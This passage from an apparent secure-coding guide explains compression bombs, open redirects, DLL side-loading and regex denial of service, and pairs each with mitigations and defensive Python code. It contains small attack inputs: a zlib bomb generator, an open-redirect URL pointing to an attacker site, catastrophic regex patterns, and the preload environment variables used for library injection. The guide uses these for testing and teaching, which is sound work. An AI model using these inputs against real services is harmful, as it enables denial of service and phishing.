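bomb = zlib.compress(b"\0" * (16 * 1024 * 1024))
# safe_decompress(bomb, limit=1024) raises ValueError instead of expanding it
```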

Notes

  • Compression is everywhere. HTTP Response headers can be compressed at the web server-to-browser level (unbeknownst to web app developers). PNG and JPEG files are susceptible to bombing. MS Office documents are simply zip files of XML.
  • Testing for this is very easy – just create a bomb with blank data and compress it heavily. Some compression tools might prevent you from over-compressing, so look up the maximum ratios of your compression algorithms instead of just trusting the compression tool.
  • Due to the super-high ratios achieved by modern compression bombing, it is NOT a feasible approach to simply limit the compressed input size. For example: 4.5PB compressed to 46MB.

Open Redirect

Description

Examples

  • Demo: open-redirect.zip – Using XAMPP, place this JSP page into the xampp-portable/tomcat/webapps/open-redirect/ folder and go to http://127.0.0.1:8080/open-redirect/open-redirect.jsp.
  • The popular bug tracking engine Trac had one of these – take a look at the fix.
  • Recently, Moodle, a popular learning management system, was also found to have had one of these – take a look at the fix.

Mitigations

  • Input validation, although more than just validating character strings – look up the URL itself. Make your whitelist a set of known, safe URLs within your app. Only allowing input that redirects to your own site is also a big step.
  • Like file paths and path traversal vulnerabilities, URLs can get pretty complicated. Java has a normalize() method in the URI class that helps you canonicalize your URL before checking it. This is especially helpful if you are in an untrusted site situation (e.g. your webapp is hosted on the same site as untrusted webapps and you want to block intra-site redirects like ../evilsite).
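
A sketch of the whitelist-plus-canonicalize idea in Python using urllib.parse (the host names and function name are illustrative): resolve the redirect target against the site's own URL and only follow it if it stays on an allowed host:

```python
from urllib.parse import urljoin, urlparse

ALLOWED_HOSTS = {"yourwebsite.com"}   # hypothetical whitelist

def safe_redirect_target(base, target):
    # urljoin resolves relative and scheme-relative targets before checking.
    resolved = urlparse(urljoin(base, target))
    if resolved.netloc not in ALLOWED_HOSTS:
        raise ValueError("refusing off-site redirect: " + target)
    return resolved.geturl()

base = "http://yourwebsite.com/login"
safe_redirect_target(base, "/account")   # OK: stays on-site
# safe_redirect_target(base, "http://www.evilwebsite.com")  -> ValueError
# safe_redirect_target(base, "//www.evilwebsite.com")       -> ValueError
#   (the scheme-relative trick is caught because urljoin resolves it first)
```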

Notes

  • While our example uses a form post, exploits more often occur in URL parameters (e.g. http://yourwebsite.com/somethingvulnerable.jsp?redirect=www.evilwebsite.com).
  • Detecting this one is the hard part. Most usages of redirects are when the URLs are not connected to user input (and are therefore safe). But, whenever user input eventually leads to a redirect, consider this issue.
  • This is a popular vulnerability used in phishing attacks (i.e. social engineering). Suppose PayPal had an open redirect vulnerability. Then an attacker could spam people asking them to check their paypal accounts. The URLs start with paypal.com, so most users would consider them safe and click through.

Dynamic Library Side-Loading

Description

  • CAPEC-159: Redirect Access to Libraries
  • CAPEC-641: DLL Side-Loading
  • We often rely on dynamically linked libraries in our applications. Dynamic libraries can have their functions overridden.

Examples

Mitigations

  • Control how a user is allowed to run your executable. If a user has control over the way your code is executed (e.g. by setting their own environment variables, or controlling the build process), then this becomes a risk.
  • Critical libraries can be statically linked and included within your packaged binary to prevent utilization of dynamic libraries. This is generally overboard and is not always necessary.
  • This kind of attack is often only possible after a compromise of the system that has given the attacker shell access, so ensure file and operating system permissions and other defenses are properly configured.

Notes

  • Dynamic libraries are available in every operating system, but they go by different names: on Linux they are called Shared Objects, on Windows Dynamic Link Libraries (DLLs), and on iOS/macOS Dynamic Libraries (dylibs).
  • There are legitimate uses for DLL Side-Loading including custom function implementations for profiling and overriding of malloc for customized memory allocation.
  • Some types of malware exploit this vulnerability by overriding common functions used by legitimate applications to cause them to carry out malicious acts. This helps to avoid some forms of malware detection as the legitimate applications are the ones carrying out the tasks.
  • Environment variables used for this attack include LD_PRELOAD on Linux, SYSTEMROOT on Windows, and DYLD_INSERT_LIBRARIES on macOS.

Regex Denial of Service (REDOS)

Description

  • Regular expressions can be written in such a way that determining if there is a match can take exponential time.
  • The key feature used is backtracking, where the regex engine works extra hard to try all possibilities.
  • OWASP Article does a great job explaining this, even with automata!

Examples

  • Try these out:
    • /^(a+)+$/
    • ([a-zA-Z]+)*
    • (a|aa)+
  • There are many historical examples of this happening over a long period of time. The Awesome ReDOS project tracks real-world examples. Find your favorite tech!
  • See our repo for demo code.

Mitigations

  • When writing your own regexes, watch out for operators inside of operators (e.g. (a+)+ has a + twice) where the repetitions can overlap.
  • When DOS matters, don’t let people submit their own regular expressions if you can avoid it.
  • If you can’t avoid any of the above, at least provide a timeout handler, such as signal in Python or setTimeout() in Javascript.
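
One way to sketch the timeout mitigation in Python (Unix fork semantics assumed; names are illustrative). The match runs in a child process so a catastrophic backtrack can actually be killed – worth knowing because in CPython a signal handler may not fire until the C-level regex engine returns:

```python
import multiprocessing
import re

def _match(pattern, text, queue):
    queue.put(bool(re.fullmatch(pattern, text)))

def match_with_timeout(pattern, text, seconds=1.0):
    queue = multiprocessing.Queue()
    proc = multiprocessing.Process(target=_match, args=(pattern, text, queue))
    proc.start()
    proc.join(seconds)
    if proc.is_alive():
        proc.terminate()             # kill the runaway match
        proc.join()
        raise TimeoutError("regex exceeded time budget")
    return queue.get()

# match_with_timeout(r"[a-z]+", "hello")         # returns quickly
# match_with_timeout(r"(a+)+$", "a" * 64 + "b")  # raises TimeoutError
```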

Notes

  • Just about every programming language supports some form of regular expressions.
  • Are you constructing a regex from user input? The (a|aa)+ example might be a good test case.
  • Since regexes are usually part of input validation, the mitigation “use input validation” does not apply here. As such, regexes tend to be on the edge of the attack surface.